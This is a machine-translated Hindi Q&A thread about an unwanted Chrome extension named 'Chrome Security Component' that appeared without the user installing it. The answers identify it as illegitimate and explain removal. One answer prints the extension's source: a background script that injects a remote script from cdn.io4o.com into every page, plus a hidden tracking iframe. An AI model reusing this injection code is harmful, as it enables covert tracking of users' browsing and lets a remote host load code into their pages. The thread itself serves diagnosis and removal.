Chrome लॉन्च करने पर पॉप-अप संदेश: परिवर्तन की पुष्टि करें - एक्सटेंशन "Chrome सुरक्षा घटक" जोड़ा गया है

Google Chrome को लॉन्च करने पर ब्राउज़र के ऊपरी दाएं कोने में एक छोटा पॉप अप संवाद बॉक्स दिखाई देता है, जो बताता है:

परिवर्तन की पुष्टि करें

एक्सटेंशन "क्रोम सुरक्षा घटक" जोड़ा गया है।

यह मुझे ओके या डिटेल्स प्रेस करने का विकल्प देता है (मैंने ओके दबाया नहीं है), लेकिन डिटेल्स दबाने पर मेरे क्रोम एक्सटेंशन के साथ एक नया टैब खुलता है।

Chrome सुरक्षा कंपोनेंट 1.0 नामक एक एक्सटेंशन है जो दाईं ओर एक टिक सक्षम है।

इसके नाम के ठीक नीचे लिखा गया है:

फ़ायरफ़ॉक्स के लिए महत्वपूर्ण सुरक्षा अद्यतन

2 छोटे बक्से हैं:

गुप्त अनुमति दें
URL तक पहुंचने दें

न तो बॉक्स टिक किए जाते हैं।

मेरी जानकारी के लिए मैंने Chrome वेब स्टोर से इस एक्सटेंशन को डाउनलोड नहीं किया है और क्या मैं सलाह लेना चाहूंगा?

किसी और को इस पार आ गया है, यह विशेष रूप से बिट फ़ायरफ़ॉक्स के लिए एक महत्वपूर्ण सुरक्षा अद्यतन होने के बारे में सही नहीं लगता है!

क्या Google Chrome सुरक्षा कारणों से अपने आप एक्सटेंशन जोड़ सकता है?

(यह भी कुछ ऐसा है जो क्रोम लॉन्च करने के आखिरी कुछ समय में बहुत बार सामने आया है, इसीलिए मुझे यकीन है कि मैंने इसे एक्सटेंशन के रूप में डाउनलोड नहीं किया है)

यहाँ छवि विवरण दर्ज करें

windows-7 google-chrome google-chrome-extensions

— साइमन
स्रोत

आप किस संस्करण का उपयोग कर रहे हैं?

— Sathyajith भट्ट

विंडोज 7 64 बिट होम प्रीमियम

— सिमोन

मैं अपने मुख्य एंटीवायरस शस्त्रागार के रूप में NIS 2013, Malwarebytes antimalware का उपयोग करता हूं

— साइमन

यदि यह वैध था, तो अन्य क्रोम उपयोगकर्ताओं के पास निश्चित रूप से एक ही एक्सटेंशन जोड़ा गया होगा और संदेश को पॉप अप किया जाएगा?

— साइमन

जवाबों:

एक्सटेंशन क्रोम वेब स्टोर पर उपलब्ध नहीं है , और जेनेरिक क्रोम प्लगइन आइकन को देखने के साथ-साथ वेबस्टोर में उपस्थिति की कमी मुझे विश्वास दिलाती है कि यह निश्चित रूप से वैध नहीं है।

आपको %localappdata%\Google Chrome\User Data\Default\Extensions\kfejhbidgehdoaglokpfddkmiepmhcckफ़ोल्डर से एक्सटेंशन स्रोत कोड की जांच करने और यह क्या करता है यह जांचने में सक्षम होना चाहिए ।

क्या Google Chrome सुरक्षा कारणों से अपने आप एक्सटेंशन जोड़ सकता है?

मैंने क्रोम के लिए बाहरी ऐप इंस्टॉल एक्सटेंशन देखे हैं (उदाहरण नॉर्टन 360 होगा जो इंस्टॉल करता है कि यह बेकार प्रोटेक्ट एक्सटेंशन है) लेकिन यह निश्चित रूप से मोज़िला के लिए नहीं है।

— सत्यजित भट्ट
स्रोत

क्या मैं इसे निष्क्रिय कर सकता हूं?

— सिमोन

इसके अलावा जिस तरह से यह फ़ायरफ़ॉक्स के लिए एक महत्वपूर्ण अद्यतन कहता है (इसका फ़ायरफ़ॉक्स से कोई लेना-देना नहीं है)!

— शमौन

थोड़ा उलझन में है कि ऊपर दिए गए उत्तर में दिए गए स्रोत कोड की जांच कैसे करें

— शमौन

@Simon गोटो ऊपर उल्लिखित पथ, मैनिफ़ेस्ट की जाँच करें। Js, और अन्य js / html फ़ाइलें। आप / अक्षम करना चाहिए कर सकते हैं / इसे हटाने

— Sathyajith भट्ट

मुझे कठिनाई हो रही थी, मार्ग का पता लगाने में, मैं स्थानीयतापद% कैसे प्राप्त करूं? मुझे लगता है कि स्क्रीनशॉट में एक्सटेंशन के बगल में एक बिन है - जहां मैं इसे वहां से हटा सकता / हटा सकता हूं (उम्मीद है)?

— साइमन

इस विस्तार के लिए यह थोड़ी अधिक जानकारी है:

Chrome Security Component


--------------------------------------
extension background.js
--------------
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo) {
    if (changeInfo.status === 'complete') {
        chrome.tabs.executeScript(tabId, {
            code: "var d = document; var js, id = 'wsk-node'; if (d.getElementById(id)) {return;}"+
                  "js = d.createElement('script'); js.id = id; js.async = true;"+
                  "js.src = '//cdn.io4o.com/js/all.js';"+
                  "d.getElementsByTagName('head')[0].appendChild(js);"
        });
    }
});


-----
//cdn.io4o.com/js/all.js
----

var host = window.location.host;

if (host != 'cdn.io4o.com') {
        var iframe = document.createElement('iframe');
        iframe.src = '//cdn.io4o.com/ga.html';
        iframe.style.width = 0;
        iframe.style.height = 0;
        iframe.style.border = 0;
        document.body.appendChild(iframe);
}

------
//cdn.io4o.com/ga.html
------

<html>
<head>
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-37051120-1']);
  _gaq.push(['_setDomainName', 'io4o.com']);

  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>
</head>
<body>
</body>
</html>

— फेडेरिको बोटा
स्रोत

उस Federico के लिए Thx, लेकिन क्या आप जानते हैं कि इसका क्या अर्थ है?

— शमौन

हाय साइमन, यह वेब पृष्ठों को ट्रैक करने के लिए Google विश्लेषिकी का उपयोग करता है। developers.google.com/analytics/devguides/collection/gajs

— फेडरिको Botta

ओह ठीक है, मैंने इसे हटा दिया, लेकिन क्या यह संभावित रूप से हानिकारक था या वास्तव में नहीं था?

— शमौन

वास्तव में यह वर्तमान स्थिति के रूप में नहीं है, लेकिन यह सभी विज़िट की गई वेब साइटों को ट्रैक करता है, जब तक कि वे js और html के लिए दूरस्थ कोड नहीं बदलते (//cdn.io4o.com/js/all.js और //cdn.io4o.com/ga.html )। व्यक्तिगत रूप से, मैं इसे हटाने का सुझाव देता हूं, जैसा कि आपने किया था ;-)

— फेडरिको बोटाटा

आपकी प्रतिक्रिया के लिए Thx

— साइमन

क्या Google Chrome सुरक्षा कारणों से अपने आप एक्सटेंशन जोड़ सकता है?

हां, Google Chrome स्वचालित एक्सटेंशन इंस्टॉलेशन की अनुमति देता है लेकिन वह सुरक्षा कारणों से प्रतिबंधित नहीं है। आपने जो अनुभव किया है वह एक तथाकथित बाहरी विस्तार है ।
से गूगल डेवलपर वेबसाइट

एक एक्सटेंशन जो स्वचालित रूप से स्थापित है, बाहरी एक्सटेंशन के रूप में जाना जाता है। Google Chrome बाहरी एक्सटेंशन स्थापित करने के दो तरीकों का समर्थन करता है:

प्राथमिकताएँ JSON फ़ाइल (केवल Mac OS X और Linux)
का उपयोग करके Windows रजिस्ट्री (केवल Windows ) का उपयोग करना

विंडोज पर वे इन रजिस्ट्री प्रविष्टियों के माध्यम से खिसक जाते हैं:

32-बिट विंडोज: HKEY_LOCAL_MACHINE \ Software \ Google \ Chrome \ एक्सटेंशन
64-बिट Windows: HKEY_LOCAL_MACHINE \ Software \ Wow6432Node \ Google \ Chrome \ एक्सटेंशन

बस अपमानजनक एक्सटेंशन आईडी हटाएं (यह एक उपकुंजी के रूप में दिखाई देगा)

— कोस्टिन गुआ
स्रोत